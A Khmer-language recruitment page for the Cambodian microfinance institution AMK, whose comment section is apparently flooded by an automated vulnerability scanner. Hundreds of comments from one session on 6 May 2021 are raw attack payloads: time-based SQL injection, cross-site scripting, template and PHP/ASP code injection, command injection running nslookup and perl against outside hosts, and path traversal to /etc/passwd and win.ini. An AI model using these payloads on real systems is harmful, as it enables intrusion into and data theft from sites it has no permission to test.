ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

គ្រឹះស្ថានមីក្រូហិរញ្ញវត្ថុ អេ អឹម ខេ ភី អិល ស៊ី
អេ អឹម ខេ គឺជាគ្រឹះស្ថានមីក្រូហិរញ្ញវត្ថុដែលឈានមុខគេមួយក្នុងប្រទេសកម្ពុជា ដែលមានបណ្តាញប្រតិបត្តិការទូទាំង ប្រទេស។ បច្ចុប្បន្ននេះ អេ អឹម ខេ មានបុគ្គលិកជាង ៣,០០០ នាក់ ដែលកំពុងបម្រើសេវាហិរញ្ញវត្ថុជូនដល់អតិថិជនប្រមាណជាង ១,០០០,០០០ នាក់ ក្នុងភូមិសរុបចំនួន ១៣,០០០ភូមិដែលស្មើនឹង ៩៨ % ក្នុងប្រទេសកម្ពុជា។ ឥឡូវនេះ អេ អឹម ខេ ត្រូវការជ្រើសរើសបុគ្គលិកដែល មានសមត្ថភាព និងប្តេជ្ញាចិត្តខ្ពស់ចូលរួមជាមួយនឹងក្រុមការងារដ៏ច្រើនសម្បូរបែបនៅគ្រប់ការិយាល័យសាខា និងបណ្តានាយកដ្ឋានទាំងអស់ទូទាំងប្រទេស សម្រាប់បំពេញនូវតម្រូវការអាជីវកម្ម។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 94

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 334 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:35:49


  @@YWb8H


 • pHqghUme

  2021-05-06 08:35:44


  1'"


 • pHqghUme

  2021-05-06 08:35:42


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:35:22


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:35:03


  nAxOYYCH')) OR 836=(SELECT 836 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:34:43


  hOdVHsPu') OR 857=(SELECT 857 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:34:26


  lIQ8lH5P' OR 777=(SELECT 777 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:34:11


  -1)) OR 42=(SELECT 42 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:33:55


  -5) OR 504=(SELECT 504 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:33:35


  -5 OR 762=(SELECT 762 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:33:20


  p6xtiKqc'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:33:02


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:32:45


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:32:24


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:32:02


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:31:43


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:31:42


  1<DWV2F4<


 • pHqghUme

  2021-05-06 08:31:33


  1<img sRc='http://attacker-9726/log.php?


 • pHqghUme

  2021-05-06 08:31:25


  1<YySecS x=9737>


 • pHqghUme

  2021-05-06 08:31:21


  1<ifRAme sRc=9323.com></IfRamE>


 • pHqghUme

  2021-05-06 08:31:20


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:31:15


  1<W9ZLBJ>QFEWU[!+!]</W9ZLBJ>


 • pHqghUme

  2021-05-06 08:31:10


  11RXRj <ScRiPt >ZysC(9241)</ScRiPt>


 • pHqghUme

  2021-05-06 08:31:05


  1<% contenteditable onresize=ZysC(9566)>


 • pHqghUme

  2021-05-06 08:30:59


  1}body{acu:Expre/**/SSion(ZysC(9549))}


 • pHqghUme

  2021-05-06 08:30:55


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:30:49


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:30:38


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:30:33


  -1' OR 2+174-174-1=0+0+0+1 or 'Jax2pQGj'='


 • pHqghUme

  2021-05-06 08:30:33


  -1" OR 2+38-38-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:30:32


  -1 OR 2+596-596-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:30:32


  -1' OR 2+91-91-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:30:31


  1<input autofocus onfocus=ZysC(9318)>


 • pHqghUme

  2021-05-06 08:30:31


  -1 OR 2+716-716-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:30:29


  qJdu2aZ8


 • pHqghUme

  2021-05-06 08:30:21


  1&lt;ScRiPt&gt;ZysC(9922)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:30:12


  1\u003CScRiPt\ZysC(9733)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:30:05


  %31%3C%53%63%52%69%50%74%20%3E%5A%79%73%43%289354%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:29:58


  1<img/src=">" onerror=alert(9259)>


 • pHqghUme

  2021-05-06 08:29:47


  1<img src=xyz OnErRor=ZysC(9800)>


 • pHqghUme

  2021-05-06 08:29:44


  1


 • pHqghUme

  2021-05-06 08:29:39


  1<img src=//xss.bxss.me/t/dot.gif onload=ZysC(9464)>


 • pHqghUme

  2021-05-06 08:29:32


  1<body onload=ZysC(9120)>


 • pHqghUme

  2021-05-06 08:29:22


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9151'>


 • pHqghUme

  2021-05-06 08:29:11


  1


 • pHqghUme

  2021-05-06 08:29:10


  1<isindex type=image src=1 onerror=ZysC(9811)>


 • pHqghUme

  2021-05-06 08:28:56


  1<ScRiPt >ZysC(9491)</ScRiPt>


 • pHqghUme

  2021-05-06 08:28:49


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9574></ScRiPt>


 • @@72uEw

  2021-05-06 08:28:47


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:28:43


  1


 • 1'"

  2021-05-06 08:28:43


  1


 • pHqghUme

  2021-05-06 08:28:41


  1<ScRiPt >ZysC(9837)</ScRiPt>


 • pHqghUme

  2021-05-06 08:28:32


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%79%73%43%28%39%31%34%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:28:25


  1<script>ZysC(9760)</script>


 • ajQhwHYY')) OR 158=(SELECT 158 FROM PG_SLEEP(15))--

  2021-05-06 08:28:16


  1


 • pHqghUme

  2021-05-06 08:28:15


  1<WJVLFX>6ZSVV[!+!]</WJVLFX>


 • pHqghUme

  2021-05-06 08:28:01


  1<ScRiPt >ZysC(9049)</ScRiPt>


 • pHqghUme

  2021-05-06 08:27:52


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • 01NWdsWS') OR 730=(SELECT 730 FROM PG_SLEEP(15))--

  2021-05-06 08:27:50


  1


 • pHqghUme

  2021-05-06 08:27:47


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:27:40


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:27:35


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:27:26


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • FY9DsClK' OR 174=(SELECT 174 FROM PG_SLEEP(15))--

  2021-05-06 08:27:23


  1


 • pHqghUme

  2021-05-06 08:27:19


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:27:08


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:26:59


  acux5814%C0%BEz1%C0%BCz2a%90bcxuca5814


 • Y1xZO2fo'; waitfor delay '0:0:15' --

  2021-05-06 08:26:58


  1


 • pHqghUme

  2021-05-06 08:26:50


  acu9177%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9177


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:26:33


  1


 • pHqghUme

  2021-05-06 08:26:32


  19954802


 • pHqghUme

  2021-05-06 08:26:26


  '"()&%<acx><ScRiPt >ZysC(9951)</ScRiPt>


 • pHqghUme

  2021-05-06 08:26:20


  1'"()&%<acx><ScRiPt >ZysC(9739)</ScRiPt>


 • pHqghUme<Jb6Us4<

  2021-05-06 08:26:15


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:26:10


  1


 • pHqghUme<img sRc='http://attacker-9383/log.php?

  2021-05-06 08:26:08


  1


 • pHqghUme<3BH6bs x=9128>

  2021-05-06 08:26:00


  1


 • pHqghUme<ifRAme sRc=9052.com></IfRamE>

  2021-05-06 08:25:53


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:25:50


  1


 • pHqghUme<WAXBDB>59QSJ[!+!]</WAXBDB>

  2021-05-06 08:25:45


  1


 • pHqghUmenXoGw <ScRiPt >ZysC(9949)</ScRiPt>

  2021-05-06 08:25:38


  1


 • pHqghUme<% contenteditable onresize=ZysC(9351)>

  2021-05-06 08:25:32


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:25:28


  1


 • pHqghUme}body{acu:Expre/**/SSion(ZysC(9977))}

  2021-05-06 08:25:27


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:25:20


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:25:15


  1


 • pHqghUme<input autofocus onfocus=ZysC(9926)>

  2021-05-06 08:25:10


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:25:05


  1


 • pHqghUme&lt;ScRiPt&gt;ZysC(9578)&lt;/sCripT&gt;

  2021-05-06 08:25:00


  1


 • pHqghUme\u003CScRiPt\ZysC(9341)\u003C/sCripT\u003E

  2021-05-06 08:24:54


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%5A%79%73%43%289822%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:24:48


  1


 • -1' OR 2+827-827-1=0+0+0+1 or '2Z0O2Uyk'='

  2021-05-06 08:24:44


  1


 • -1" OR 2+290-290-1=0+0+0+1 --

  2021-05-06 08:24:44


  1


 • -1 OR 2+660-660-1=0+0+0+1

  2021-05-06 08:24:43


  1


 • -1' OR 2+43-43-1=0+0+0+1 --

  2021-05-06 08:24:43


  1


 • -1 OR 2+231-231-1=0+0+0+1 --

  2021-05-06 08:24:42


  1


 • 8Sbuzr7b

  2021-05-06 08:24:41


  1


 • pHqghUme<img/src=">" onerror=alert(9630)>

  2021-05-06 08:24:41


  1


 • pHqghUme<img src=xyz OnErRor=ZysC(9113)>

  2021-05-06 08:24:33


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=ZysC(9901)>

  2021-05-06 08:24:24


  1


 • pHqghUme

  2021-05-06 08:24:22


  1


 • pHqghUme<body onload=ZysC(9971)>

  2021-05-06 08:24:14


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9565'>

  2021-05-06 08:24:05


  1


 • pHqghUme

  2021-05-06 08:24:00


  1


 • pHqghUme<isindex type=image src=1 onerror=ZysC(9189)>

  2021-05-06 08:23:53


  1


 • pHqghUme<ScRiPt >ZysC(9697)</ScRiPt>

  2021-05-06 08:23:43


  1


 • pHqghUme

  2021-05-06 08:23:42


  1


 • pHqghUme

  2021-05-06 08:23:39


  1


 • pHqghUme

  2021-05-06 08:23:38


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9954></ScRiPt>

  2021-05-06 08:23:38


  1


 • pHqghUme<ScRiPt >ZysC(9771)</ScRiPt>

  2021-05-06 08:23:33


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%79%73%43%28%39%38%30%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:23:24


  1


 • pHqghUme

  2021-05-06 08:23:22


  1


 • pHqghUme<script>ZysC(9960)</script>

  2021-05-06 08:23:18


  1


 • pHqghUme<WPHP65>MMT2L[!+!]</WPHP65>

  2021-05-06 08:23:10


  1


 • pHqghUme

  2021-05-06 08:23:04


  1


 • pHqghUme<ScRiPt >ZysC(9729)</ScRiPt>

  2021-05-06 08:23:02


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:22:55


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:22:45


  1


 • pHqghUme

  2021-05-06 08:22:42


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:22:34


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:22:27


  1


 • pHqghUme

  2021-05-06 08:22:20


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:22:17


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:22:06


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:21:59


  1


 • pHqghUme

  2021-05-06 08:21:54


  1


 • acux5089%C0%BEz1%C0%BCz2a%90bcxuca5089

  2021-05-06 08:21:51


  1


 • acu6289%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6289

  2021-05-06 08:21:42


  1


 • pHqghUme9583705

  2021-05-06 08:21:35


  1


 • pHqghUme

  2021-05-06 08:21:32


  1


 • '"()&%<acx><ScRiPt >ZysC(9551)</ScRiPt>

  2021-05-06 08:21:25


  1


 • pHqghUme'"()&%<acx><ScRiPt >ZysC(9805)</ScRiPt>

  2021-05-06 08:21:18


  1


 • pHqghUme

  2021-05-06 08:21:11


  1


 • pHqghUme

  2021-05-06 08:21:10


  1


 • pHqghUme

  2021-05-06 08:21:04


  1


 • pHqghUme

  2021-05-06 08:20:55


  1


 • pHqghUme

  2021-05-06 08:20:54


  1


 • pHqghUme

  2021-05-06 08:20:43


  1


 • pHqghUme

  2021-05-06 08:20:38


  1


 • pHqghUme

  2021-05-06 08:20:35


  1


 • pHqghUme

  2021-05-06 08:20:29


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:20:29


  1


 • pHqghUme

  2021-05-06 08:20:28


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:20:27


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:20:26


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:20:25


  '"


 • pHqghUme

  2021-05-06 08:20:25


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 08:20:25


  <!--


 • pHqghUme

  2021-05-06 08:20:25


  ';print(md5(31337));$a='


 • '"

  2021-05-06 08:20:24


  1


 • ${@print(md5(31337))}\

  2021-05-06 08:20:24


  1


 • <!--

  2021-05-06 08:20:24


  1


 • '.print(md5(31337)).'

  2021-05-06 08:20:24


  1


 • pHqghUme

  2021-05-06 08:20:23


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:20:23


  1


 • ${@print(md5(31337))}

  2021-05-06 08:20:23


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:20:22


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:20:22


  1


 • pHqghUme

  2021-05-06 08:20:22


  1


 • pHqghUme

  2021-05-06 08:20:21


  1


 • pHqghUme

  2021-05-06 08:20:21


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 08:20:21


  1


 • pHqghUme

  2021-05-06 08:20:21


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:20:20


  1


 • pHqghUme

  2021-05-06 08:20:20


  1


 • pHqghUme

  2021-05-06 08:20:19


  1


 • pHqghUme

  2021-05-06 08:20:18


  1


 • pHqghUme

  2021-05-06 08:20:18


  1


 • pHqghUme

  2021-05-06 08:20:18


  '"()


 • pHqghUme

  2021-05-06 08:20:17


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:20:17


  1


 • pHqghUme

  2021-05-06 08:20:17


  1


 • pHqghUme

  2021-05-06 08:20:17


  '+'A'.concat(70-3).concat(22*4).concat(103).concat(70).concat(97).concat(68)+(require'socket' Socket.gethostbyname('hitkv'+'joqrunzp53c61.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:20:16


  1


 • /xfs.bxss.me

  2021-05-06 08:20:16


  1


 • '+'A'.concat(70-3).concat(22*4).concat(107).concat(65).concat(115).concat(72)+(require'socket' Socket.gethostbyname('hitgw'+'atjkayzp8ce64.bxss.me.')[3].to_s)+'

  2021-05-06 08:20:16


  1


 • pHqghUme

  2021-05-06 08:20:16


  1


 • pHqghUme

  2021-05-06 08:20:16


  "+"A".concat(70-3).concat(22*4).concat(97).concat(86).concat(107).concat(88)+(require"socket" Socket.gethostbyname("hitod"+"iewuimce4bb0b.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:20:15


  1


 • pHqghUme

  2021-05-06 08:20:15


  1


 • pHqghUme

  2021-05-06 08:20:15


  1


 • pHqghUme

  2021-05-06 08:20:15


  1


 • pHqghUme

  2021-05-06 08:20:15


  1


 • "+"A".concat(70-3).concat(22*4).concat(106).concat(83).concat(117).concat(83)+(require"socket" Socket.gethostbyname("hitku"+"azpywkco570a2.bxss.me.")[3].to_s)+"

  2021-05-06 08:20:15


  1


 • pHqghUme

  2021-05-06 08:20:14


  1


 • pHqghUme

  2021-05-06 08:20:14


  1


 • pHqghUme

  2021-05-06 08:20:14


  1


 • pHqghUme

  2021-05-06 08:20:13


  1


 • pHqghUme

  2021-05-06 08:20:13


  1


 • '"()

  2021-05-06 08:20:13


  1


 • pHqghUme

  2021-05-06 08:20:13


  1


 • pHqghUme

  2021-05-06 08:20:12


  1


 • pHqghUme

  2021-05-06 08:20:12


  1


 • pHqghUme

  2021-05-06 08:20:12


  1


 • pHqghUme

  2021-05-06 08:20:12


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:20:11


  HttP://bxss.me/t/xss.html?%00


 • bxss.me/t/xss.html?%00

  2021-05-06 08:20:10


  1


 • pHqghUme

  2021-05-06 08:20:10


  1


 • pHqghUme

  2021-05-06 08:20:09


  1


 • pHqghUme

  2021-05-06 08:20:09


  `(nslookup hitxzrlhfkcvfcd2c0.bxss.me||perl -e "gethostbyname('hitxzrlhfkcvfcd2c0.bxss.me')")`


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:20:09


  1


 • pHqghUme

  2021-05-06 08:20:09


  1


 • pHqghUme

  2021-05-06 08:20:08


  ".gethostbyname(lc("hitrp"."fcrlgkycdd35c.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(69).chr(121).chr(90)."


 • pHqghUme

  2021-05-06 08:20:08


  1


 • pHqghUme

  2021-05-06 08:20:08


  |(nslookup hitqtdaldclbz1af7d.bxss.me||perl -e "gethostbyname('hitqtdaldclbz1af7d.bxss.me')")


 • pHqghUme

  2021-05-06 08:20:08


  1


 • pHqghUme

  2021-05-06 08:20:07


  '.gethostbyname(lc('hitfr'.'zoouwwke83d7b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(83).chr(113).chr(76).'


 • pHqghUme

  2021-05-06 08:20:07


  1


 • '.gethostbyname(lc('hityj'.'fsrxrupafc5c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(78).chr(113).chr(90).'

  2021-05-06 08:20:06


  1


 • pHqghUme

  2021-05-06 08:20:06


  1


 • ".gethostbyname(lc("hithj"."uzxghvye703d3.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(65).chr(100).chr(72)."

  2021-05-06 08:20:06


  1


 • pHqghUme

  2021-05-06 08:20:06


  1


 • pHqghUme

  2021-05-06 08:20:05


  1&n999223=v955694


 • pHqghUme

  2021-05-06 08:20:04


  $(nslookup hitkplpqsfyun7475e.bxss.me||perl -e "gethostbyname('hitkplpqsfyun7475e.bxss.me')")


 • pHqghUme

  2021-05-06 08:20:04


  1


 • pHqghUme

  2021-05-06 08:20:03


  |echo bbbqop$()\ aolxgq\nz^xyu||a #' |echo bbbqop$()\ aolxgq\nz^xyu||a #|" |echo bbbqop$()\ aolxgq\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:20:03


  1


 • pHqghUme

  2021-05-06 08:20:03


  (nslookup hitrlufyodils8d713.bxss.me||perl -e "gethostbyname('hitrlufyodils8d713.bxss.me')")


 • pHqghUme

  2021-05-06 08:20:03


  1


 • pHqghUme

  2021-05-06 08:20:02


  &echo gppvej$()\ ztdedl\nz^xyu||a #' &echo gppvej$()\ ztdedl\nz^xyu||a #|" &echo gppvej$()\ ztdedl\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:20:01


  echo otuohk$()\ jtxolk\nz^xyu||a #' &echo otuohk$()\ jtxolk\nz^xyu||a #|" &echo otuohk$()\ jtxolk\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:20:01


  1


 • pHqghUme

  2021-05-06 08:20:01


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:20:01


  1


 • pHqghUme

  2021-05-06 08:20:00


  !(()&&!|*|*|


 • ^(#$!@#$)(()))******

  2021-05-06 08:19:59


  1


 • pHqghUme

  2021-05-06 08:19:59


  )


 • )

  2021-05-06 08:19:58


  1


 • pHqghUme

  2021-05-06 08:19:58


  bxss.me


 • !(()&&!|*|*|

  2021-05-06 08:19:58


  1


 • pHqghUme&n959794=v991797

  2021-05-06 08:19:57


  1


 • pHqghUme

  2021-05-06 08:19:57


  1


 • pHqghUme

  2021-05-06 08:19:57


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 08:19:57


  1


 • pHqghUme

  2021-05-06 08:19:57


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:19:56


  1


 • pHqghUme

  2021-05-06 08:19:56


  1


 • pHqghUme

  2021-05-06 08:19:56


  1some_inexistent_file_with_long_name%00.jpg


 • `(nslookup hitzgxzdwzxzi2b8d6.bxss.me||perl -e "gethostbyname('hitzgxzdwzxzi2b8d6.bxss.me')")`

  2021-05-06 08:19:55


  1


 • pHqghUme

  2021-05-06 08:19:55


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • |(nslookup hittrnnungifl87ded.bxss.me||perl -e "gethostbyname('hittrnnungifl87ded.bxss.me')")

  2021-05-06 08:19:54


  1


 • bxss.me

  2021-05-06 08:19:54


  1


 • pHqghUme

  2021-05-06 08:19:54


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 08:19:54


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:19:53


  1


 • pHqghUme

  2021-05-06 08:19:53


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:19:52


  1


 • pHqghUme

  2021-05-06 08:19:51


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:19:51


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:19:51


  1


 • pHqghUme

  2021-05-06 08:19:50


  1


 • pHqghUme

  2021-05-06 08:19:50


  1


 • pHqghUme

  2021-05-06 08:19:49


  1


 • pHqghUme

  2021-05-06 08:19:48


  1


 • pHqghUme

  2021-05-06 08:19:48


  1


 • pHqghUme

  2021-05-06 08:19:48


  1


 • $(nslookup hitzsmawqootvb1963.bxss.me||perl -e "gethostbyname('hitzsmawqootvb1963.bxss.me')")

  2021-05-06 08:19:48


  1


 • pHqghUme

  2021-05-06 08:19:47


  1


 • (nslookup hitzdpwvldkzgbc685.bxss.me||perl -e "gethostbyname('hitzdpwvldkzgbc685.bxss.me')")

  2021-05-06 08:19:47


  1


 • &echo smeuoi$()\ qapnbh\nz^xyu||a #' &echo smeuoi$()\ qapnbh\nz^xyu||a #|" &echo smeuoi$()\ qapnbh\nz^xyu||a #

  2021-05-06 08:19:46


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:19:46


  1


 • |echo nxqbxk$()\ wyegjk\nz^xyu||a #' |echo nxqbxk$()\ wyegjk\nz^xyu||a #|" |echo nxqbxk$()\ wyegjk\nz^xyu||a #

  2021-05-06 08:19:46


  1


 • pHqghUme

  2021-05-06 08:19:46


  1


 • pHqghUme

  2021-05-06 08:19:45


  1


 • echo dgvgwj$()\ otvdhd\nz^xyu||a #' &echo dgvgwj$()\ otvdhd\nz^xyu||a #|" &echo dgvgwj$()\ otvdhd\nz^xyu||a #

  2021-05-06 08:19:44


  1


 • pHqghUme

  2021-05-06 08:19:43


  1


 • pHqghUme

  2021-05-06 08:19:43


  1


 • pHqghUme

  2021-05-06 08:19:43


  1


 • pHqghUme

  2021-05-06 08:19:40


  1


 • pHqghUme

  2021-05-06 08:19:39


  1


 • SzBCOERLaWE=

  2021-05-06 08:19:37


  1


 • pHqghUme

  2021-05-06 08:19:35


  1


 • pHqghUme

  2021-05-06 08:19:35


  ../1


 • pHqghUme

  2021-05-06 08:19:35


  1


 • pHqghUme

  2021-05-06 08:19:34


  1


 • pHqghUme

  2021-05-06 08:19:34


  1


 • pHqghUme

  2021-05-06 08:19:34


  ${9999694+9999528}


 • pHqghUme

  2021-05-06 08:19:33


  1


 • ${9999672+10000126}

  2021-05-06 08:19:33


  1


 • pHqghUme

  2021-05-06 08:19:33


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 08:19:32


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:19:32


  1


 • pHqghUme

  2021-05-06 08:19:31


  1


 • ../pHqghUme

  2021-05-06 08:19:31


  1


 • pHqghUme

  2021-05-06 08:19:31


  1


 • pHqghUme

  2021-05-06 08:19:31


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:19:30


  1


 • pHqghUme

  2021-05-06 08:19:30


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:19:29


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:19:29


  1


 • pHqghUme

  2021-05-06 08:19:29


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:19:28


  1


 • pHqghUme

  2021-05-06 08:19:28


  1


 • pHqghUme

  2021-05-06 08:19:28


  1


 • pHqghUme

  2021-05-06 08:19:28


  1


 • pHqghUme

  2021-05-06 08:19:27


  1


 • pHqghUme

  2021-05-06 08:19:27


  1


 • pHqghUme

  2021-05-06 08:19:26


  1


 • pHqghUme

  2021-05-06 08:19:26


  1


 • pHqghUme

  2021-05-06 08:19:26


  1


 • pHqghUme

  2021-05-06 08:19:25


  1


 • pHqghUme

  2021-05-06 08:19:25


  1


 • pHqghUme

  2021-05-06 08:19:25


  1


 • pHqghUme

  2021-05-06 08:19:24


  1


 • pHqghUme

  2021-05-06 08:19:24


  1


 • pHqghUme

  2021-05-06 08:19:24


  1


 • pHqghUme

  2021-05-06 08:19:23


  1


 • pHqghUme

  2021-05-06 08:19:22


  1


 • pHqghUme

  2021-05-06 08:19:22


  1


 • pHqghUme

  2021-05-06 08:19:21


  1


 • pHqghUme

  2021-05-06 08:19:20


  1


 • pHqghUme

  2021-05-06 08:19:19


  1


 • pHqghUme

  2021-05-06 08:19:19


  H6nnVPhL


 • pHqghUme

  2021-05-06 08:19:19


  1


 • XNqsHjoC

  2021-05-06 08:19:18


  1


 • pHqghUme

  2021-05-06 08:19:16


  "+response.write(9939104*9957942)+"


 • pHqghUme

  2021-05-06 08:19:16


  1


 • pHqghUme

  2021-05-06 08:19:16


  1


 • pHqghUme

  2021-05-06 08:19:15


  response.write(9939104*9957942)


 • pHqghUme

  2021-05-06 08:19:15


  '+response.write(9939104*9957942)+'


 • "+response.write(9313337*9283798)+"

  2021-05-06 08:19:14


  1


 • '+response.write(9313337*9283798)+'

  2021-05-06 08:19:13


  1


 • pHqghUme

  2021-05-06 08:19:12


  1


 • response.write(9313337*9283798)

  2021-05-06 08:19:12


  1


 • pHqghUme

  2021-05-06 08:19:11


  1


 • pHqghUme

  2021-05-06 08:19:10


  1


 • pHqghUme

  2021-05-06 08:19:10


  1


 • pHqghUme

  2021-05-06 08:19:09


  1


 • pHqghUme

  2021-05-06 08:19:08


  1


 • pHqghUme

  2021-05-06 08:19:05


  1


 • pHqghUme

  2021-05-06 08:18:59


  1


 • pHqghUme

  2021-05-06 08:18:59


  1


 • pHqghUme

  2021-05-06 08:18:41


  1
